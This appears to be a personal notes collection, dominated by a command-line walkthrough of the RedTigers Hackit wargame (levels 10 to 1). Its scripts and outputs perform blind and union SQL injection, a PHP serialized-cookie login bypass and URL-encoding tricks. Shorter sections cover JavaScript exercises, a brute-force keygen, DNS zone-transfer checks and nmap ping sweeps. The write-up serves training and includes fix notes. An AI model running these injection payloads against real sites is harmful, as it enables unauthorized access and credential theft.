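# RedTigers Hackit wargame: Level 10

Note: the hidden `login` field is a base64-encoded PHP serialized array, so the client controls both the values and their types. Replacing the password string with the boolean `b:1` is accepted, which suggests the server unserializes the field and compares the password loosely (`==`). The server-side fix is to stop unserializing client-supplied data (keep the login state in a server-side session, or parse JSON with explicit type checks) and to compare secrets strictly, for example with `hash_equals()`.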


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>

# RedTigers Hackit wargame: Level 9


# curl --silent --insecure --cookie-jar level9 --cookie level9 --request POST --data "password=736c61705f7468655f6c616d65727a&level9login=Login" https://redtiger.dyndns.org/hackit/level9.php
                <b>Welcome to Level 9</b><br><br>
                Target: Get username and password of any user. Tablename: level9_users<br>
                Its not a blind. There is a way to get an output :) <br>
                <br><br>
        Autor: RedTiger <br>Title: Lorem ipsum <br>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. <br><br>                     <form method="POST">
                                Name: <input type="text" name="autor"> <br>
                                Title: <input type="text" name="title"><br>
                                <textarea name="text"></textarea>
                                <input type="submit" name="post">
                        </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(username, $[14-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(password,$[146-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(username),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(password),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='),((select username from level9_users limit 1),(select password from level9_users limit 1),'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | sed 's/<br>/\n/g' | grep -A 1 Autor
Autor: RedTiger
Title: Lorem ipsum
--
Autor:
Title:
--
Autor: 546865426c7565466c6f776572
Title: 212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "user=546865426c7565466c6f776572&password=253231253246666c6f776572703239253344253235643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f753733343935383337343935383734253234253235254137253235253236254137253234253236254137253234253235253236253231254137253234253235444653414446415344465344313334353334353132333472356173644651574525323525413725323425323644466173646661733233343536&login=Login" https://redtiger.dyndns.org/hackit/level9.php | grep is:
<br>The password for the next level is: <b>646f6e745f7468726f775f73746f6e6573</b> <br><br>

# RedTigers Hackit wargame: Level 8


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
# for i in `seq 1 18`; do for j in `echo {a..z} {0..9}`; do email="' or left(right(password,$[19-$i]),1)='$j"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>

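# RedTigers Hackit wargame: Level 7

Note: the keyword blacklist on this level (no comments, substr, substring, ascii, mid, like) does not stop the injection; the transcript below gets the same result with `ord`, `left` and `right`. Filtering function names is not a fix. The search term has to be passed to the database as a bound parameter (prepared statement) so it is never parsed as SQL.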


# curl --silent --insecure --cookie-jar level7 --cookie level7 --request POST --data "password=646f6e745f73686f75745f61745f796f75725f6469736b73&level7login=Login" https://redtiger.dyndns.org/hackit/level7.php
                <b>Welcome to Level 7</b><br><br>
                Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
                Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
                <br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
                                <br>
                        <form method="post">
                                Username: <input type="text" name="username"><br>
                                <input type="submit" name="try" value="Check!">
                        </form>
                        <br>
# for i in `seq 1 17`; do for j in `echo {A..Z} {a..z} {0..9}`; do d=`printf "%d\n" \'$j`; search="Google%' and ord(left(right(news.autor,$[18-$i]),1))=$d and '%'='"; result=`curl --silent --insecure --cookie level7 --request POST --data "search=$search&dosearch=search\!" https://redtiger.dyndns.org/hackit/level7.php | grep -v "<input" | grep Google`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
5465737455736572666f72673030676c65
# curl --silent --insecure --cookie level7 --request POST --data "username=5465737455736572666f72673030676c65&try=Check\!" https://redtiger.dyndns.org/hackit/level7.php | grep is:
<br>The password for the next level is: <b>4d4f4f636f774d454f57636174</b> <br><br>

# RedTigers Hackit wargame: Level 6


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>dumbi@damibi.de</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
# for i in `seq 1 11`; do for j in `echo {a..z} {0..9}`; do d=` printf "%d\n" \'$j`; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$[12-$i]),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep deddlef`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>

# RedTigers Hackit wargame: Level 5


# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <br>
                                <input name="login" value="Login" type="submit">
                        </form>
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>

# RedTigers Hackit wargame: Level 4


# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data "password=646f6e745f7075626c6973685f736f6c7574696f6e735f41524748&level4login=Login" https://redtiger.dyndns.org/hackit/level4.php
                <b>Welcome to Level 4</b><br><br>
                Target: Get the value of the first entry in table level4_secret in column keyword<br>
                Disabled: like<br><br><br> <a href="?id=1">Click me</a><br><br><br>
        Query returned 1 rows. <br /><br />                     <br><br><br>
                        <form method="post">
                                Word: <input type="text" name="secretword"><br>
                                <input type="submit" name="go" value="Go!">
                        </form>
                        <br>
# for i in `seq 1 50`; do echo $i; result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20length(keyword)%20from%20level4_secret)=$i,1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# for i in `seq 1 17`; do for j in `echo {a..z} {0..9}`; do result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20substring(keyword,$i,1)%20from%20level4_secret)='$j',1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then echo -n "$j"; break; fi; done; done; echo
626c696e64696e6a656374696f6e313233
# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data 'secretword=626c696e64696e6a656374696f6e313233&go=Go!' https://redtiger.dyndns.org/hackit/level4.php | grep is:
<br>The password for the next level is: <b>62616e616e61735f6172655f6e6f745f626c7565</b> <br><br>

# RedTigers Hackit wargame: Level 3


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 /**
  * Encode $str for use in the level's `usr` URL parameter.
  *
  * Each byte is XORed with the constant 192, written as a decimal number
  * left-padded with zeros to three digits, and the concatenated digits are
  * base64-encoded.
  *
  * The mask is a fixed constant and nothing authenticates the result, so this
  * is an obfuscation, not encryption: anyone who knows the scheme can produce
  * valid values. Code that decodes such a parameter must still treat the
  * decoded string as untrusted input.
  *
  * @param string $str Plain text to encode.
  * @return string Base64 text of the three-digit decimal groups.
  */
 function encrypt($str) {
  $digits = "";
  $length = strlen($str);
  for ($pos = 0; $pos < $length; $pos++) {
   // XOR with 192 flips the two high bits of the byte.
   $masked = ord($str[$pos]) ^ 192;
   // Fixed width of three digits keeps the groups separable when decoding.
   $digits .= str_pad((string)$masked, 3, "0", STR_PAD_LEFT);
  }
  return base64_encode($digits);
 }
 echo encrypt($argv[1])."\n";
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>

# RedTigers Hackit wargame: Level 2


# curl --silent --insecure --cookie-jar level2 --cookie level2 --request POST --data "password=656173796c6576656c7361726565617379&level2login=Login" https://redtiger.dyndns.org/hackit/level2.php
<b>Welcome to level 2</b>
<br><br>
A simple loginbypass
<br><br>
Target: Login
<br>
Hint: Condition
<br><br><br>

<form method="POST">
        Username: <input type="text" name="username"><br>
        Password: <input type="password" name="password"><br>
        <input type="submit" name="login" value="Login">
</form>
# curl --silent --insecure --cookie level2 --request POST --data "username=' or 'u'='u&password=' or 'p'='p&login=Login" https://redtiger.dyndns.org/hackit/level2.php | grep is:
<br>The password for the next level is: <b>73656375726974796d656f775f736179735f636174</b> <br><br>

# RedTigers Hackit wargame: Level 1


# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
<br><br>
Lets start with a simple injection.
<br><br>
Target: Get the login for the user Hornoxe
<br>
Hint: You really need one? omg -_-
<br>
Tablename: level1_users
<br><br><br>


<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
7468617477617365617379
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>

# Encode and decode QR codes


Introduction

QR (Quick Response) code is a type of matrix (2D) barcode.
QR codes have greater storage capacity compared to standard UPC (Universal Product Code) barcodes.

http://en.wikipedia.org/wiki/QR_code

Encode

# apt-get install qrencode
# wc -c glider.png
724 glider.png
# xxd -p -c 724 glider.png | qrencode -o qrcode.png
Decode

# apt-get install zbar-tools
# zbarimg --quiet --raw qrcode.png | xxd -p -r > result
# file result
result: PNG image data, 55 x 55, 8-bit grayscale, non-interlaced

# Codecademy: JavaScript


1. Introduction

"text";
"text".length;
3 + 4;
4 / 2;
14 % 3;
//comment
confirm("I feel awesome");
prompt("What is your name?");
["I'm coding like a champ!".length] > 10
console.log("Hello");
console.log(15 > 4);
console.log("Xiao Hui".length < 122);
console.log("Goody Donaldson".length != 8);
console.log(8*2 === 16);
console.log(true !== true);
if ( 1 > 2 ) {
 alert("I am right");
} else {
 console.log("I am wrong");
}
"wonderful day".substring(3,7);
var myName = "Leng";
var myAge = 30;
var isOdd = true;
myName.length;
var age = prompt("What's your age?");
2. Functions

var divideByThree = function (number) {
 var val = number / 3;
 console.log("Result = " + val);
};
divideByThree(6);

// Returns twice the given number.
var timesTwo = function(number) {
 var doubled = 2 * number;
 return doubled;
};
var newNumber = timesTwo(2);
console.log(newNumber);

// Returns the perimeter of a rectangle: two lengths plus two widths.
var perimeterBox  = function(length, width) {
 var bothLengths = length * 2;
 var bothWidths = width * 2;
 return bothLengths + bothWidths;
};
perimeterBox(2,2);

var multiplied = 5; // Global
var timesTwo = function(number) {
 var multiplied = number * 2; // Local
};
timesTwo(4);
console.log(multiplied);
3. 'For' Loops

for (var counter = 1; counter < 11; counter++) {
 console.log(counter);
}

for (var i = 5; i <= 50; i+=5) {
 console.log(i);
}

for (var i = 10; i >= 0; i--) {
 console.log(i);
}

for (var i = 100; i >= 1; i-=5) {
 console.log(i);
}

var junk = ["Mao","Gandhi",1,2];
console.log(junk);
console.log(junk[0]);
console.log(junk.length);
4. 'While' Loops

var understand = true;
while( understand ){
 console.log("I'm learning while loops!");
 understand = false;
}

loopCondition = false;
do {
 console.log("I'm gonna stop looping 'cause my condition is " + String(loopCondition) + "!");
} while (loopCondition);
5. More on Control Flow

var lunch = prompt("What do you want for lunch?","Type your lunch choice here");
switch(lunch){
 case 'sandwich':
  console.log("Sure thing! One sandwich, coming up.");
  break;
 case 'soup':
  console.log("Got it! Tomato's my favorite.");
  break;
 case 'salad':
  console.log("Sounds good! How about a caesar salad?");
  break;
 case 'pie':
  console.log("Pie's not a meal!");
  break;
 default:
  console.log("Huh! I'm not sure what " + lunch + " is. How does a sandwich sound?");
}

true && true // => true
false || false // => false
!true // => false
!false // => true
6. Data Structures

var newArray = [[11,12,13], [21,22,23], [31,32,33]];
var jagged = [[11,12,13], [21], [31,32]];
var phonebookEntry = {};
phonebookEntry.name = 'Oxnard Montalvo';
phonebookEntry.number = '(555) 555-5555';
phonebookEntry.phone = function() {
 console.log('Calling ' + this.name + ' at ' + this.number + '...');
};
phonebookEntry.phone();

var myObj = new Object();
myObj["name"] = "Charlie";
myObj.name = "Charlie";
7. Objects I

var bob = {};
var bob = {
 name: "Bob Smith",
 age: 30
};
var name = bob.name;
var age = bob.age;

var dog = {
 species: "greyhound",
 weight: 60,
 age: 4
};
var species = dog["species"];
var weight = dog["weight"];
var age = dog["age"];

var bob = new Object();
bob.name = "Bob Smith";
bob.age = 30;
bob.setAge = function (newAge){
 this.age = newAge;
};
bob.setAge(40);

function Person(name,age) {
 this.name = name;
 this.age = age;
}
var bob = new Person("Bob Smith", 30);

var family = new Array();
family[0] = new Person("alice", 40);
family[1] = new Person("bob", 42);

// Returns person1's age minus person2's age (negative when person2 is older).
var ageDifference = function(person1, person2) {
  var firstAge = person1.age;
  var secondAge = person2.age;
  return firstAge - secondAge;
};
var alice = new Person("Alice", 30);
var billy = new Person("Billy", 25);
var diff = ageDifference(alice,billy);
8. Objects II

var myObj = { job: "I'm an object!" };
console.log( typeof myObj ); // => object
console.log( myObj.hasOwnProperty('job') ); // => true

var nyc = {
 fullName: "New York City",
 mayor: "Michael Bloomberg",
 population: 8000000,
 boroughs: 5
};
for (var property in nyc){
 console.log(property);
}
for (var i in nyc){
 console.log(nyc[i]);
}

function Dog (breed) {
 this.breed = breed;
};
var buddy = new Dog("golden Retriever");
Dog.prototype.bark = function() {
 console.log("Woof");
};

function Animal(name, numLegs) {
 this.name = name;
 this.numLegs = numLegs;
}
Animal.prototype.sayName = function() {
 console.log("Hi my name is " + this.name);
};
function Penguin(name){
 this.name = name;
 this.numLegs = 2;
}
Penguin.prototype = new Animal();

// Constructor for a person with public name/age fields and a bank balance
// that lives only in the constructor's closure.
function Person(first,last,age) {
 // Not a property of the instance: reachable only through the functions
 // defined in this constructor call.
 var bankBalance = 7500;

 // Private helper; it is not attached to `this`.
 var returnBalance = function() {
  return bankBalance;
 };

 this.firstname = first;
 this.lastname = last;
 this.age = age;

 // Public accessor: returns the balance value.
 this.getBalance = function() {
  return bankBalance;
 };

 // Public accessor: returns the private helper itself (a function), not the
 // balance; the caller has to invoke the result to get the number.
 this.askTeller = function() {
  return returnBalance;
 };
}

# Key generator


# cat keygen
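#!/bin/bash
#
# keygen - print every string of LENGTH symbols over ALPHABET, one per line.
#
# Usage:   keygen LENGTH ALPHABET
# Example: keygen 3 "{a..z} {A..Z} {0..9}"
#
# The script writes a program of LENGTH nested `for` loops and hands it to a
# child bash; running it as shell text is what lets brace ranges in ALPHABET
# expand.
#
# NOTE(security): ALPHABET is pasted unquoted into the text given to
# `bash -c`, so any shell syntax in it (`;`, `$(...)`, backticks) is executed
# by the child shell. Call this only with an alphabet you wrote yourself; do
# not connect it to input that comes from another user or from the network.

if [[ $# -ne 2 ]]; then
        printf 'Usage: %s LENGTH ALPHABET\n' "${0##*/}" >&2
        exit 2
fi

length=$1
alphabet="$2"

# LENGTH becomes loop bounds and variable names in the generated program, so
# accept decimal digits only.
if [[ ! "$length" =~ ^[0-9]+$ ]]; then
        printf '%s: LENGTH must be a non-negative integer: %s\n' "${0##*/}" "$length" >&2
        exit 2
fi
# Force base 10 so a value with leading zeros is not read as octal.
count=$((10#$length))

program=""
word=""
closing=""
for ((i = 1; i <= count; i++)); do
        program+="for p$i in $alphabet; do "
        word+="\$p$i"
        closing+="; done"
done

# printf instead of echo, so a symbol such as -n or -e is printed rather than
# taken as an option.
program+="printf '%s\\n' \"$word\"$closing"

# noglob keeps symbols like * or ? in ALPHABET from matching file names.
/bin/bash -c "set -o noglob;$program"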
# ./keygen 3 "{a..z} {A..Z} {0..9}"
aaa
aab
aac
aad
aae
...
995
996
997
998
999

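# DNS zone transfer

Note: a full zone transfer (AXFR) hands the requester every record in the zone. An authoritative server should allow it only from its own secondaries (in BIND, `allow-transfer`), ideally authenticated with TSIG. The commands below are a quick way to confirm that your servers refuse the request from any other address.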


dig

# dig @dns_server domain axfr
nslookup

C:> nslookup - dns_server
> set type=any
> ls -d domain

# Keyboard shortcuts


bash

ctrl+p: History: previous command (arrow_up).
ctrl+n: History: next command (arrow_down).
ctrl+d: Signal end-of-file (EOF). Close the window, exit program.
ctrl+c: Abort current command/typing.
ctrl+w: Erase word to the left.
alt+d: Erase word to the right.
ctrl+u: Erase line to the left.
ctrl+k: Erase line to the right.
ctrl+y: Yank/Paste previously erased string.
alt+b: Move one word to the left.
alt+f: Move one word to the right.
ctrl+a: Move to beginning of line.
ctrl+e: Move to end of line.
ctrl+r: History: reverse search.
ctrl+z: Stop execution of the current job.
tab: Autocomplete command/file name.
shift+ins: Paste contents of clipboard at cursor.
shift+page_up: Scroll window up.
shift+page_down: Scroll window down.

cmd

arrow_up: History: previous command.
arrow_down: History: next command.
ctrl+c: Abort current command/typing.
ctrl+home: Erase line to the left.
ctrl+end: Erase line to the right.
ctrl+arrow_left: Move one word to the left.
ctrl+arrow_right: Move one word to the right.
home: Move to beginning of line.
end: Move to end of line.
F8: History: reverse search.
tab: Autocomplete file name.


vim

x: Delete char to the right of cursor.
dw: Delete word to the right of cursor.
db: Delete word to the left of cursor.
0: Go to start of line.
$: Go to end of line.
1G: Go to start of document.
$G: Go to end of document.
b: Go to previous word.
w: Go to next word.
k: Go to previous line (arrow-up).
j: Go to next line (arrow-down).
{: Go to previous paragraph.
}: Go to next paragraph.
/: Search.
N: Go to previous search result.
n: Go to next search result.
:%s/yin/yang/g: Search and replace.

# Fast tools for ping sweeps


nmap

# apt-get install nmap
# nmap -n -sn -PE -T5 --max-retries 1 --min-parallelism 100 -iL subnets.txt
46432 IP addresses scanned in 72 seconds
# nmap -n -sn -PE -T5 --max-retries 0 --min-parallelism 100 -iL subnets.txt | grep -v Warning
46432 IP addresses scanned in 48 seconds

zmap

# wget https://github.com/zmap/zmap/archive/v1.0.0.tar.gz
# tar xvzf v1.0.0.tar.gz
